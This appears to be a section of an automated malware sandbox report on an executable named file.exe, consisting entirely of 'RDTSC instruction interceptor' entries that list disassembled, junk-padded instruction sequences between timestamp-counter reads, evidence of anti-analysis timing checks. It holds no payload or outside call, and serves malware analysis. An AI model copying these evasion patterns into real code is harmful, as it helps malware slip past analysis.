                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA67F5 second address: BA67F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6964 second address: BA6978 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FF624C752FCh 0x0000000e ja 00007FF624C752F6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA5E second address: BAAA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA7D second address: BAAA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAAA81 second address: BAAA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB35C3 second address: BB35F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FF624C75300h 0x00000012 jo 00007FF624C752F8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF624C752FBh 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2392 second address: BB239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB239B second address: BB239F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB24FA second address: BB2500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2500 second address: BB2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2504 second address: BB251B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF624B4E7D6h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB251B second address: BB251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2823 second address: BB282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB282B second address: BB2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624C752FDh 0x0000000b ja 00007FF624C752F6h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2848 second address: BB285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF624B4E7DEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB285C second address: BB2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2E97 second address: BB2EA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2EA3 second address: BB2EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF624C752F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2EAF second address: BB2ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f jno 00007FF624B4E7DAh 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75DA6 second address: B75DB2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75DB2 second address: B75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E7h 0x00000009 popad 0x0000000a jns 00007FF624B4E7DCh 0x00000010 popad 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D199Bh], edi 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d mov cx, 734Ch 0x00000021 lea eax, dword ptr [ebp+1247AADFh] 0x00000027 cmc 0x00000028 add edi, dword ptr [ebp+122D2E6Eh] 0x0000002e nop 0x0000002f jnp 00007FF624B4E7E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75E03 second address: B75E16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 ja 00007FF624C752F6h 0x0000000f pop edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75EC7 second address: B75ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75ECC second address: B75ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75F82 second address: B75F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76298 second address: B762B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C75306h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762B9 second address: B762BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762BF second address: B762C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B762C3 second address: B762C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B764E8 second address: B76516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FF624C752FEh 0x0000000d push ecx 0x0000000e jnl 00007FF624C752F6h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007FF624C75301h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76516 second address: B76529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007FF624B4E7E0h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76529 second address: B76537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76537 second address: B7653C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7670E second address: B76712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B76712 second address: B76716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7686A second address: B76870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7710E second address: B77114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77114 second address: B77122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77122 second address: B77191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FF624B4E7D8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jno 00007FF624B4E7DCh 0x00000028 lea eax, dword ptr [ebp+1247AB23h] 0x0000002e jmp 00007FF624B4E7DDh 0x00000033 nop 0x00000034 push ebx 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 pop edx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b jp 00007FF624B4E7DEh 0x00000041 nop 0x00000042 mov cx, EEE3h 0x00000046 lea eax, dword ptr [ebp+1247AADFh] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77191 second address: B77195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B77195 second address: B7719B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7719B second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF624C752FAh 0x00000011 nop 0x00000012 mov edx, edi 0x00000014 call dword ptr [ebp+122D28B2h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624C752FBh 0x00000021 jne 00007FF624C752FCh 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB4A second address: B2BB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB54 second address: B2BB66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF624C752FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B69 second address: BB6B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B71 second address: BB6B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6B75 second address: BB6B7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6E86 second address: BB6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6FEF second address: BB700C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E9h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB700C second address: BB7010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7010 second address: BB7016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7016 second address: BB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF624C75302h 0x0000000c jng 00007FF624C752F6h 0x00000012 je 00007FF624C752F6h 0x00000018 ja 00007FF624C752F8h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB703B second address: BB7063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624B4E7E8h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7063 second address: BB706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB706C second address: BB7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7076 second address: BB707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB707A second address: BB7083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B616B8 second address: B616BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBAB5 second address: BBBAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBAC0 second address: BBBACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBC23 second address: BBBC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBC2A second address: BBBC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC016 second address: BBC01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC01C second address: BBC020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC020 second address: BBC02E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC1A0 second address: BBC1A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC1A8 second address: BBC1B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF624B4E7D6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC5DA second address: BBC5DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF6B2 second address: BBF6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF6B6 second address: BBF6C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0DCB second address: BC0E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624B4E7E2h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FF624B4E7E6h 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FF624B4E7DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0E07 second address: BC0E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0E0B second address: BC0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3E49F second address: B3E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38ED second address: BC38FA instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC38FA second address: BC3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8490 second address: BC8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8499 second address: BC84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC84B4 second address: BC84B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC860A second address: BC8610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8610 second address: BC8618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8618 second address: BC861D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC861D second address: BC8622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC878A second address: BC8797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8797 second address: BC87B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FF624B4E7D6h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC87B9 second address: BC87C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC894A second address: BC8968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FF624B4E7FDh 0x0000000b pushad 0x0000000c jmp 00007FF624B4E7DEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8AEF second address: BC8B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624C75309h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8B23 second address: BC8B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE978 second address: BCE986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624C752F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD482 second address: BCD4AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF624B4E7DCh 0x0000000f jbe 00007FF624B4E7D6h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4AB second address: BCD4D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C752FCh 0x00000008 jmp 00007FF624C75304h 0x0000000d popad 0x0000000e js 00007FF624C752FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4D7 second address: BCD4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF624B4E7FBh 0x0000000e pushad 0x0000000f jmp 00007FF624B4E7E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4FB second address: BCD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD7B0 second address: BCD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
